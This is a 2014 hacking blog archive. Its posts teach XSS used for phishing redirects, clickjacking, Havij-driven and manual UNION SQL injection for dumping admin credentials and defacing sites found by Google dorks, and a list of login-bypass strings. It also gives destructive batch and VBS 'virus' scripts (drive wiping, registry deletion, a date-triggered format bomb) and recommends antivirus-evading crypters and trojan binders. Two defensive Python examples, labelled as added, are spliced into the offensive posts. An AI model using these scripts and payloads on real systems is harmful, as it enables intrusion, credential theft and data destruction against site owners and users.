Friday, 28 November 2014

XSS - Cross Site Scripting

XSS is basically a way to redirect the user to another webpage without the user knowing about it.
There are two types of XSS:
* Reflective
* Stored

Reflective XSS:

This is the most common type of XSS. In this case the code is not stored on the server side. Let me show you a demo of this. Let us assume there exists a web page with a search box in it.

http://www.search.com/

Now type anything in the box and look at the URL. If we type “hacking”, the URL becomes as follows:

Now in the URL, you can see q=hacking. Also look at the source code of the green box highlighted above. It is as follows:

<input type="text" id="searchbox" value="hacking">

Now suppose this website is vulnerable to XSS. If we make the URL:
http://www.search.com/search?q="><script>alert("hacked")</script>
the HTML code of the box would become as follows:
<input type="text" id="searchbox" value=""><script>alert("hacked")</script>
What has happened is that we have manually closed the input box and written our own script tag. So if you give this link to someone, “hacked” would pop up on the screen.

This link is also very good: http://ha.ckers.org/xss.html, once you get the hang of XSS.


Now when you give this link to someone, they will actually go to http://www.yoursite.com, thus fooling the user.
The following is a POC (Proof of Concept).
http://www.google.com/search?btnI&q=allinurl:http://www.yahoo.com/

In this case it is going to go to http://www.yahoo.com even though the URL starts with http://www.google.com. You can also encode the URL so that the user doesn’t see the last part of the URL. You can learn how to do that here: http://pc-help.org/obscure.htm

You can go to http://www.xssed.com and check out the XSS vulnerabilities in all the websites and use it to your advantage.

E.g. you can make a phishing site of Gmail and give the victim a link with http://www.google.com/(link which is vulnerable to XSS) which will redirect the user to your phishing site. The user won’t know, as he will mostly see the starting part of the URL; thus he is fooled. You can’t use the above link (given for POC) for your phishing page. :p Guess why!

Try using some other XSS vulnerability from xssed.com or try finding your own XSS vulnerability on some website.

STORED XSS:

In this type of XSS, the malicious code is stored on the server. E.g. take the case of a guest book which takes user input, stores it in a database and displays it to other users. If the code is “buggy”, a hacker can insert JavaScript there so that every time any user opens that page, the script is executed without the user knowing.

Reflective XSS is more common on the internet as the developers are more careful when something is being written to the server database :p
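
Both cases above (the reflected search box and the stored guest book) are closed by encoding user input for the HTML context it is written into. The following is an added example, not code from the original post; the function names and the guest book markup are assumptions for illustration, and the sample inputs are constructed.

```python
import html
from html.parser import HTMLParser

# Payload shape taken from the search-box walkthrough above.
PAYLOAD = '"><script>alert("hacked")</script>'

# Constructed guest book entries: one normal, one carrying markup.
ENTRIES = ["Nice site!", "<script>alert('hacked')</script>"]


def render_search_vulnerable(q):
    """Reflects the query into the value attribute with no encoding."""
    return '<input type="text" id="searchbox" value="' + q + '">'


def render_search_safe(q):
    """Encodes & < > " ' so the value can never close the attribute."""
    return ('<input type="text" id="searchbox" value="'
            + html.escape(q, quote=True) + '">')


def render_guestbook_vulnerable(entries):
    """Writes stored entries straight into the page for every visitor."""
    return "<ul>" + "".join("<li>" + e + "</li>" for e in entries) + "</ul>"


def render_guestbook_safe(entries):
    """Encodes each stored entry at output time, whatever the database holds."""
    return "<ul>" + "".join("<li>" + html.escape(e) + "</li>" for e in entries) + "</ul>"


class TagCollector(HTMLParser):
    """Records the elements and text the markup actually parses into."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.tags = []        # element names in document order
        self.input_attrs = {} # attributes of the <input>, entity-decoded
        self.text = []        # text nodes, entity-decoded

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.input_attrs = dict(attrs)

    def handle_data(self, data):
        self.text.append(data)


def parse(markup):
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector


if __name__ == "__main__":
    for name, page in [
        ("search, vulnerable", render_search_vulnerable(PAYLOAD)),
        ("search, encoded", render_search_safe(PAYLOAD)),
        ("guest book, vulnerable", render_guestbook_vulnerable(ENTRIES)),
        ("guest book, encoded", render_guestbook_safe(ENTRIES)),
    ]:
        print(name, "->", parse(page).tags)
```

In the encoded versions the parser sees no `script` element: the payload survives only as the attribute value or as visible text, which is the property to check for when reviewing a template.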

Interesting Information:

XSS is a very dangerous vulnerability. Bank websites take utmost care to see that their code is not vulnerable to XSS as they are the most targeted. Just imagine if a bank URL redirects to some hacker’s phishing page. All the user’s details are lost!

The best video tutorial of XSS is here:  http://infinityexists.com/videos/episode13/. You can either watch it online or download it.

The toughest part about XSS is finding a vulnerable piece of code and filter evasion. Many sites have code such that malicious code is filtered out from the user input, so the thrill is in finding a way to evade this filter!


Thursday, 27 November 2014

Clickjacking

A clickjacking attack allows an attacker to perform an action on a victim website; mostly Facebook and Twitter accounts are targeted. It happens when an attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they were intending to click on the top-level page. Thus, the attacker is "hijacking" clicks meant for their page and routing them to another page, most likely owned by another application, domain, or both. It may be similar to a CSRF (Cross-Site Request Forgery) attack.

Clickjacking is a term first introduced by Jeremiah Grossman and Robert Hansen in 2008 to describe a technique whereby an attacker tricks a user into performing certain actions on a website by hiding clickable elements inside an invisible iframe.

Using a similar technique, keystrokes can also be hijacked. With a carefully crafted combination of stylesheets, iframes, and text boxes, a user can be led to believe they are typing in the password to their email or bank account, but are instead typing into an invisible frame controlled by the attacker.

At present this attack is mostly used on social network websites like Facebook and Twitter, because it works by convincing the victim to click on a link, and social network websites are very useful for reaching the victim.

Code:

 <style>
 iframe { /* iframe from facebook.com */
  width:300px;
  height:100px;
  position:absolute;
  top:0; left:0;
  filter:alpha(opacity=50); /* in real life opacity=0 */
  opacity:0.5;
}
</style>

<div>Click on the link to get more followers:</div>
   
<iframe src="/files/tutorial/window/clicktarget.html"></iframe>

<a href="http://www.google.com" target="_blank" style="position:relative;left:20px;z-index:-1">CLICK ME!</a>

<div>You'll be get 10000 followers..!!</div>

Output:
Click on the link to get more followers
Click Me
You'll be get 10000 followers..!!


Download:
ClickJacking Tool


For Defence:
Clickjacking Protection


For more information:
OWASP


Thursday, 13 November 2014

Hack Sites Using Havij

Just follow these easy steps:

1. First download Havij from here
http://itsecteam.com/

2. Run the Havij SQL Injection software and copy and paste the vulnerable website link

3. Now click the “Analyze” button

4. It then shows some messages. Watch them and be patient for some time while it finds whether the site is vulnerable and the type of injection, and, if the DB server is MySQL, finds the database name. After that you get its database name, like xxxx_xxxx

5. Then move to another operation to find tables by clicking “tables” as shown in the figure. Now click “Get tables”, then wait some time if needed

6. After the tables are found, you will see “users” there. Put a mark on it and click the “get columns” tab

7. In that, just mark username and password and click “Get data”

8. Finally you now have the username and password of the admin…


Tuesday, 11 November 2014

V.I.R.U.S Scripts

IMPORTANT NOTE: This code is only for knowledge of the concept. All scripts here are to be copied into Notepad.


This Virus Deletes All The Content Of A Drive...

@echo off del %systemdrive%\*.* /f /s /q shutdown -r -f -t 00 Save The Above Code a .bat file

Disable Internet Permanently Save As A bat File

echo @echo off>c:windowswimn32.bat echo break off>>c:windowswimn32.bat echo ipconfig/release_all>>c:windowswimn32.bat echo end>>c:windowswimn32.bat reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f echo You Have Been HACKED! PAUSE

The Most Simple Virus To Crush The Window

@Echo off Del C:\ *.* |y Save It As Any.bat

This Will Crash Ur Computer

Option Explicit Dim WSHShell Set WSHShell=Wscript.CreateObject("Wscript.Shell") Dim x For x = 1 to 100000000 WSHShell.Run "Tourstart.exe" Next Save It As Anything.vbs It Only Works With Windows XP

Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]
This will delete key registry files, then loops a message (CANNOT BE RECOVERED FROM)*

Code:- @ECHO OFF START reg delete HKCR/.exe START reg delete HKCR/.dll START reg delete HKCR/* :MESSAGE ECHO Your computer has been fcked. Have a nice day. GOTO MESSAGE

Endless Notepads

*This will pop up endless notepads until the computer freezes and crashes* Code:- @ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top

Bomb Virus

Copy Paste The Following If %date% NEQ 2014/11/20 goto exit format E: /y >nul :exit exit And Save It As Anything.bat Note:- You Can Change The Date ( 2014/11/20 ) Of The Virus And The Location ( format E: ) On Which It Does Its Action The Virus Will Take Effect On That Day

Crazy caps lock

*This constantly turns caps lock on and off really fast continuously* Code:- Set wshShell =wscript.CreateObject(”WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “{CAPSLOCK}” loop

Endless Enter

*This constantly makes it so the enter button is being pressed continuesly* Code:- Set wshShell = wscript.CreateObject(”WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “~(enter)” loop

Endless Backspace

*This makes it so the backspace key is constantly being pressed* Code:- MsgBox “Let’s go back a few steps” Set wshShell =wscript.CreateObject(”WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “{bs}” loop

Make Your Keyboard Disco Light


This trick just makes your keyboard lights do disco. The script I’m sharing with you, when executed makes your Caps, Num and Scroll Lock’s light flash in a cool rhythmic way!
1.This piece of code makes your keyboard a live disco..
Set wshShell =wscript.CreateObject(“WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “{CAPSLOCK}” wshshell.sendkeys “{NUMLOCK}” wshshell.sendkeys “{SCROLLLOCK}” loop
2.This one makes it looks like a chain of light….
Set wshShell =wscript.CreateObject(“WScript.Shell”) do wscript.sleep 200 wshshell.sendkeys “{CAPSLOCK}” wscript.sleep 100 wshshell.sendkeys “{NUMLOCK}” wscript.sleep 50 wshshell.sendkeys “{SCROLLLOCK}” loop
Instructions: *paste any of the two above codes in notepad *Save as “AnyFileName”.vbs *Run the file *To stop, launch task manager and then under “Processes” end “wscript.exe”


Monday, 10 November 2014

V.I.R.U.S

Vital Information Resource Under Siege

Introduction:

A VIRUS is a small, executable program with the ability to replicate itself, usually without the permission or knowledge of the user. The word "virus" is the generic term for worms, viruses and Trojans. Computer viruses are called ‘viruses’ because they share some common characteristics of biological viruses. Computer viruses, like biological viruses, are task specific. They are designed to infect a designated target. This can be a specific type of file or computer sub-system. A virus must piggyback on top of some other program to get executed. It passes from computer to computer like biological viruses pass from person to person. Fighting computer viruses is like human intelligence fighting against itself. Virus-masters continuously upgrade their techniques to ensure their survival in the computing environment. Computer virologists face the task of combating new viruses that have been developed by members of their own programming fraternity. Once they have found anti-virus software to take care of an existing virus, virus-meisters invent a new string of viruses, which are even more difficult to decipher or crack.


The appearance of computer viruses is one of the most interesting developments in technology in the twentieth century. Computer viruses are mysterious but fascinating at the same time. Every time a new virus hits, it makes the news. On the other hand they show how sophisticated they have become in terms of technology, and it is precisely our dependence on technology that makes us so vulnerable.

Coming back to viruses... A virus can add its code anywhere in the host program and/or the system area of a hard disk or floppy disk. The host program is nothing but an executable file like .EXE, .COM, etc. Anywhere in the file means that the virus code can get appended at the beginning, at the end, in the middle, or by simply placing a pointer to a different location on disk where the virus can find it. It is coded in such a way that the virus code gets executed first. Also, the code it appends to a file is normally not the complete source code of the virus. It is just the self-replicating part, so that it can attack more programs.

Difference between a computer virus and other programs

Viruses are designed to self-replicate, usually without the knowledge of the user. They often contain “payloads”, actions that the virus carries out separately from replication.

Viruses can be hidden in:
* Programs available on floppy disks or CDs
* E-mail attachments
* Material downloaded from the web

Payload of computer viruses

The payload is the malicious activity that the virus carrying it performs. In short, we can define the payload as the extent of damage a virus is supposed to cause. A payload can be triggered by a number of conditions like:
* A certain date of the month or year
* Execution of certain programs
* A built-in counter

Examples of what a payload can do:
* Delete files
* Confidential information access and release
* E-mail: unauthorized mass e-mailing
* File modification
* Overwriting security settings
* System instability
* Degrading system performance (steals system cycles)

Virus Behavior:

In general, a virus has two phases, “infection phase” and “attack phase”. The first phase is the infection phase, where the virus reproduces widely and the second is the attack phase, where they do whatever damage they are programmed to do. Its presence can be felt only when they activate themselves.


Infection phase

Virus writers have to balance how and when their virus should infect against the possibility of being detected. Therefore the spread of infection may not be immediate. This is the phase where the virus commences the acquisition of the system by first infecting the identified target, second taking charge of the target and lastly by installing its own command. These steps are coded in detail in the instruction code given to it by the author. No one knows when exactly a virus will infect other programs or, in simple words, when it will activate itself. Some viruses infect each time they are executed, and some viruses will infect upon a trigger. You can never be sure that your system is not infected by a virus after running an AV program a few times. This is because the virus would not have started its infection phase. The virus writer will want his program to spread as far as possible so that in the second phase, "the attack phase", the victim’s computer will have a positive impact to the virus.

Many viruses go resident in memory. This provides an upper hand for the virus, as it can wait for an external event before it starts the infection, and the trigger used by the virus also becomes hard to guess. The resident virus frequently takes over a portion of the system software to hide its presence. This technique is called stealth.

Attack phase

Not all viruses attack, but all use system resources and often have bugs. Most viruses do unpleasant things like deleting files or changing random data on your disk, slowing down your PC, stealing passwords from the system and mailing them to a remote email address, etc. Viruses often delay revealing their presence by launching their attack only after they have had ample opportunity to spread. This means that the attack phase can start even after months of infection. The attack phase is optional. Many viruses simply reproduce themselves and have no trigger for an attack phase.

Classification of Computer viruses

Viruses can be classified in a number of ways. One way of classifying them is as follows:
* Environment
  * File viruses
    * Overwriting virus
    * Parasitic virus or Cavity (space-filler) virus
    * Companion virus
    * File worms
    * Link viruses or cluster viruses
    * Source code viruses (OBJ, LIB viruses)
    * Tunneling viruses
    * Camouflage virus
  * Boot viruses
    * Parity boot
    * Boot-and-file virus
    * System sector virus
  * Macro viruses
  * Network viruses
  * VB worms
* Operating system (OS)
* Different algorithms of work
  * Terminate and stay resident (TSR) virus
  * Stealth algorithm
  * Armored virus
  * Polymorphic or self-encrypting capabilities
  * Logic bombs

work on windows xp


Sunday, 9 November 2014

SQL Strings

Strings List:


admin'--
' or 1=1--
'" or 1=1--
' union select 1, 'Eyeless', 'ez2do', 1--
admin'--
administrator'--
superuser'--
test'--
' or 0=0 --
' or 0=0 --'
' or 0=0 #
" or 0=0 --
" or 0=0 --'
'" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
" or 1=1--
or 1=1--
' or a=a--'
' or a=a #
' or a=a--
' or "a"="a
' or 'a'='a
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a

Saturday, 8 November 2014

SQL Injection



SQL is Structured Query Language. This language is used to work on the database. Commands such as SELECT, INSERT, DELETE are used to update information in the database.
In this type of attack, we make use of a vulnerability wherein we supply our own commands to the website’s database and successfully deface it. This vulnerability occurs when the user’s input is not filtered or is improperly filtered.

Step 1: Looking for the Vulnerability
www.something.com/news/news.php?id=130
The above URL can be vulnerable to SQL injection. It is taking the ID as 130 and returning some values. To see if the URL is vulnerable, put a ' at the end of the URL. So try this URL
www.something.com/news/news.php?id=130'
Now if you get an error saying something like it’s not a valid MySQL statement, then it is possible to exploit this URL. Example: When I did it on a website vulnerable to this exploit, I got the following
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\” at line 1
One more thing: if the URL ends in .php?catid=x, where x is a number, even then you can use the above method to see if the site is vulnerable.
So, now you know if the website is vulnerable or not, but how do you find websites which are vulnerable? Easy! You use a Google dork to do this. So you are going to use Google to find vulnerable websites. So type the following in Google:
1. inurl:.php?id=
2. inurl:.php?catid=
So now you will get a list of websites. Test them one by one with the method mentioned above to see if they are vulnerable.

Step 2: Exploiting the vulnerability
This tutorial is only for educational purposes. Kindly do not misuse it.
You have a vulnerable URL
www.something.com/news/news.php?id=130
OK, now how do you deface it?
Finding number of columns
Now put the following in the URL
http://www.something.com/news/news.php?id=130 order by 10--
Now we told the database to order it by the 10th column. Your job is to find how many columns there are in the table. So if order by 10 gave you an error, replace 10 by 9 and try it. Or if 10 gave a valid reply, put 11 and try.
Also, the -- (two dashes) at the end means “comment”. So anything after this statement is commented off and only our query is put in.
So assume I got an error for order by 10, then I tried order by 9 and so on. Finally I got no error at 6 and an error at 7. Hence, the table has 6 columns.
Find Vulnerable columns
Now we will use the union all and select commands to find a vulnerable column. Remember to put a - in front of that ID number. Like here, I have made it id=-130.
http://www.something.com/news/news.php?id=-130 union select all 1,2,3,4,5,6,--
Since it has 6 columns, we do select all 1,2,3,4,5,6 and a -- at the end.
This will give an output. Whichever column number comes out in bold in the output, that column is vulnerable. Just remember this column number. Assume I got 2 as the vulnerable column.
Finding tables
Now our job is to find the different tables in the database. We do the following:
http://www.something.com/news/news.php?id=-130 union select all group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database() --
Here group_concat(table_name) will give you all the table names in the database. information_schema holds information about the database, so we are just querying from that.
Finding Column names
Similarly, get all the columns by simply replacing ‘table’ with ‘column’
http://www.something.com/news/news.php?id=-130 union select all 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()--
Now you will be able to find all the column names from all the tables. After all the columns from one table, there will be an “id” and then all the columns from the next table and so on.
If this doesn’t work then you can do
http://www.something.com/news/news.php?id=-130 union select all 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name="some table you got from the previous step"--

Final Step
Now in the list of columns look for some interesting columns like username or password. So now you should know the table name and column names you want, e.g. the username and password columns from the tbl_admin table
http://www.something.com/news/news.php?id=-130 union select all 1,group_concat(username,0x3a,password),3,4,5,6 from tbl_admin--
Now I just put the column names in the group_concat with 0x3a in between, which is ASCII for colon, and tbl_admin is the table name where these columns are.
Now I got output something like
admin:"encrypted hash",user2:"encrypted hash", and so on…
So usernames are not encrypted here and passwords are encrypted.
So your job is almost done. Now you will get all the users and passwords. Usually the passwords will be encrypted in md5. You can decrypt it. Just use google dorks :
Defacing
Now you have the admin username and admin password from the previous step. Now you have to find the admin page of the site.
Go to http://tools.th3-0utl4ws.com/admin-finder/ and put in your website there.
It will give you the admin page after some time.
Mine turned out to be http://www.something.com/admin
So here you get a login box. Put in the username and password of the admin and that’s it.
Now do whatever you want, like defacing or deleting tables etc…
There is a reason I have not told you what the something.com is. You can use the Google dorks I mentioned to find any vulnerable site.
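
Every step of this tutorial, and every entry in the "SQL Strings" list above, depends on the application pasting user input into the query text. The following is an added example, not code from the original posts, showing the vulnerable pattern beside the parameterized fix. It assumes an in-memory SQLite database in place of the PHP/MySQL site described; the table contents, function names and the simplified UNION input are constructed for illustration.

```python
import sqlite3

# Constructed inputs: a UNION in the shape the tutorial describes, and two
# entries from the "SQL Strings" list.
UNION_INPUT = "-130 UNION SELECT 1, username, password FROM tbl_admin"
LOGIN_STRINGS = ["admin'--", "' or 1=1--"]


def make_db():
    """Build a constructed database: one news row, one admin row."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE tbl_admin (username TEXT, password TEXT);
        INSERT INTO news VALUES (130, 'Launch day', 'Constructed article text');
        INSERT INTO tbl_admin VALUES ('admin', 'constructed-password-hash');
    """)
    return conn


def get_news_vulnerable(conn, raw_id):
    """news.php?id=... built by string concatenation: input becomes SQL."""
    sql = "SELECT id, title, body FROM news WHERE id = " + raw_id
    return conn.execute(sql).fetchall()


def get_news_safe(conn, raw_id):
    """Validate the type, then bind the value; it is never parsed as SQL."""
    try:
        news_id = int(raw_id)
    except ValueError:
        return []  # not a number: nothing to look up
    return conn.execute(
        "SELECT id, title, body FROM news WHERE id = ?", (news_id,)
    ).fetchall()


def login_vulnerable(conn, username, password):
    """Login check built by concatenation; a quote in the input ends the string."""
    sql = ("SELECT COUNT(*) FROM tbl_admin WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone()[0] > 0


def login_safe(conn, username, password):
    """Same check with bound parameters; quotes and -- are just characters."""
    row = conn.execute(
        "SELECT COUNT(*) FROM tbl_admin WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] > 0


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable lookup:", get_news_vulnerable(conn, UNION_INPUT))
    print("safe lookup:      ", get_news_safe(conn, UNION_INPUT))
    for s in LOGIN_STRINGS:
        print(repr(s), "vulnerable:", login_vulnerable(conn, s, "x"),
              "safe:", login_safe(conn, s, "x"))
```

The single-quote probe from Step 1 raises a syntax error in `get_news_vulnerable` and returns an empty result from `get_news_safe`, so database error text reaching the browser is itself a sign that a query is being assembled from input.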

Friday, 7 November 2014

Hacking Tools

Tools

BEWARE: THESE TOOLS CAN DAMAGE YOUR DEVICE.

PROXY FINDER

Proxy Finder searches the web and find thousands of valid and working proxies in seconds. It can find low, medium and also high anonymity proxies so we can remain anonymous online.

Download here

ANONYMOUS SURFING : HOTSPOT SHIELD

Hotspot Shield protects your entire web surfing session; securing your connection at both your home Internet network & Public Internet networks (both wired and wireless). Hotspot Shield protects your identity by ensuring that all web transactions (shopping, filling out forms, downloads) are secured through HTTPS. Hotspot Shield also makes you private online making your identity invisible to third party websites and ISP’s. Unless you choose to sign into a certain site, you will be anonymous for your entire web session with Hotspot Shield. Hotspot Shield creates a virtual private network (VPN) between your laptop or iPhone and our Internet gateway. This impenetrable tunnel prevents snoopers, hackers, ISP’s, from viewing your web browsing activities, instant messages, downloads, credit card information or anything else you send over the network. Hotspot Shield security application employs the latest VPN technology, and is easy to install and use.

Download here

ANONYMOUS SURFING : PC MESH ANONYMOUS WEB SURFING

PC Mesh Anonymous Web Surfing is an internet utility to hide your IP address while you are browsing the web. IP address is your internet identification number which is detectable by any web site that you visit. It is fully automatic. You don't need to have any knowledge of setting up proxy connections. Just click "Autopilot" and watch. PC Mesh Anonymous Web Surfing will check your real IP address, verify a large number of proxy servers with a lightning fast speed, delete the non-functional proxies, sort them by ping, select the fastest proxy, check your IP address again and compare it with your real IP address.

Download here

ANONYMOUS SURFING : IP ANONYMIZER

IP Anonymizer is a software which hides your IP address by making use of website proxies and enables you to surf. It is simple and easy to use and requires no configuration. Just click on "Enable anonymity online" and it will start its work . It also includes anonymous surfing wizard which guides you to the different parts of the software like online privacy etc.

Download here

ANONYMOUS SURFING : GHOSTSURF PLATINUM

The ultimate IP address hider and anonymizer which include the following features: * Encrypts your Internet connection * Erases all traces of your Web surfing * Removes aggressive spyware * Prevents identity theft and credit card fraud * Secures confidential files * Eliminates online ads * Also includes Spycatcher which is an excellent anti-spyware.

Download here

CRYPTER SOFTWARE TO BYPASS ANTIVIRUS DETECTION : FUD KRYPTONITE CRYPTER

This is another FUD crypter used to crypt the source code of your keylogger, RAT or botnet etc so that they are not detected by antiviruses. The advantage of using it is that it is almost FUD, only Avira and Sophos Antivirus detected it on NoVirusThanks.

Download here

CRYPTER SOFTWARE TO BYPASS ANTIVIRUS DETECTION : FUD t3c4i3 CRYPTER

This Crypter is an easy to use and a fully undetectable (FUD) crypter software used to hide our viruses, RATs or any keylogger from anti-viruses so that they are not detected and deleted by antiviruses. It allows users to crypt the source code of their program and assigns hidden values to each individual code within source code. Thus, the source code becomes hidden. Hence, our sent crypted trojan and virus easily bypasses antivirus detection.

Download here

BINDER SOFTWARE TO HIDE KEYLOGGERS/TROJANS : SIMPLE BINDER

Simple Binder is a software used to bind or combine two or more files in one file under one name and extension. The files to be binded can have any extension or icon. The user has choice to select the name, icon and various attributes of binded file. If binded file contains an application, the application is also run when the actual binded file is run. Password: hackingguide

Download here

BINDER SOFTWARE TO HIDE KEYLOGGERS/TROJANS : WEEKEND BINDER

Weekend Binder is another software used to bind or combine two or more files in one file under one name and extension. The files to be binded can have any extension or icon. The user has choice to select the name, icon and various attributes of binded file. If binded file contains an application, the application is also run when the actual binded file is run. Password: hackingguide

Download here

DARK PORT SCANNER

Dark Port Scanner is a simple port scanner with an easy to use interface which scans for open ports on computers in a network.

Download here

ANGRY IP SCANNER

Angry IP scanner is a very fast IP address and port scanner. It can scan IP addresses in any range as well as any of their ports. It is cross-platform and lightweight. Angry IP scanner simply pings each IP address to check if it's alive, then optionally resolves its hostname, determines the MAC address, scans ports, etc. It also has additional features, like NetBIOS information (computer name, workgroup name, and currently logged in Windows user), favorite IP address ranges, web server detection, customizable openers, etc. Scanning results can be saved to CSV, TXT, XML or IP-Port list files.

Download here

PACKET SNIFFER : TCP DUMP

Tcpdump is the classic IP sniffer which requires fewer system resources. It is great for tracking down network problems or monitoring activity.

Download here

NETWORK SCANNING TOOL : NMAP

Nmap ("Network Mapper") is a free and open source utility for network exploration or security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts.

Download here

PACKET SNIFFER : WIRESHARK

Wireshark is a fantastic open source network protocol analyzer for Unix and Windows. It allows you to examine data from a live network or from a capture file on disk. You can interactively browse the capture data, delving down into just the level of packet detail you need. Wireshark has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session. It also supports hundreds of protocols and media types.

Download here

WIRELESS SNIFFER : KISMET

Kismet is a console based 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. It identifies networks by passively sniffing and can even decloak hidden networks if they are in use. It can automatically detect network IP blocks by sniffing TCP, UDP, ARP, and DHCP packets, log traffic in Wireshark/TCPDump compatible format, and even plot detected networks and estimated ranges on downloaded maps.

Download here

WEP/WPA CRACKING TOOL : AIRCRACK

Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking like Airsnort, but it is more efficient as it can crack both WEP and WPA passwords. It can recover a 40 through 512-bit WEP key once enough encrypted packets have been gathered. It can also attack WPA 1 or 2 networks using advanced cryptographic methods or by brute force. The suite includes airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files).

Download here

VULNERABILITY ASSESSMENT TOOL : NESSUS

Nessus is still the best UNIX vulnerability scanner available and among the best to run on Windows. Nessus is constantly updated, with more than 20,000 plugins. Key features include remote and local (authenticated) security checks, a client/server architecture with a GTK graphical interface, and an embedded scripting language for writing your own plugins or understanding the existing ones.

Download here

THE ULTIMATE PENETRATION TESTING TOOL : METASPLOIT

The Metasploit Framework is the open source penetration testing framework with the world's largest database of public, tested exploits. The Metasploit Project is an open-source computer security project which provides information about security vulnerabilities and aids in penetration testing.

Download here

VULNERABILITY ASSESSMENT TOOL : RETINA

Retina's function is to scan all the hosts on a network and report on any vulnerabilities found.

Download here

VULNERABILITY SCANNER : X-SCAN

A multi-threaded, plug-in-supported vulnerability scanner. X-Scan includes many features, including full NASL support, detecting service types, remote OS type/version detection, weak user/password pairs, and more.

Download here

WEBSITE HACKING SOFTWARE : ADMIN FINDER

Admin Finder is a tool which scans the vulnerable websites for administrator login pages. It makes use of a predefined list for finding the admin login pages. After finding the pages, it may present you the page on which we can login with the administrator password. Password: hackingguide

Download here

WEBSITE HACKING SOFTWARE : EXPLOIT SCANNER

Exploit Scanner is a tool which scans the website to check if it is vulnerable to attack or not. You just have to enter the URL and it will instantly produce the results as if the website is vulnerable to attack or not. Password: hackingguide

Download here

WEBSITE HACKING SOFTWARE : SQLI HELPER

SQLI Helper is a tool that will hack vulnerable websites using SQL injection. You don't have to spend hours and hours trying to find your way in a website and trying hundreds of combinations and codes to hack a website. There is also no need of knowledge of SQL to use this software. This tool will do it all by itself. You only have to tell it what to do and where to look. Password: hackingguide

Download here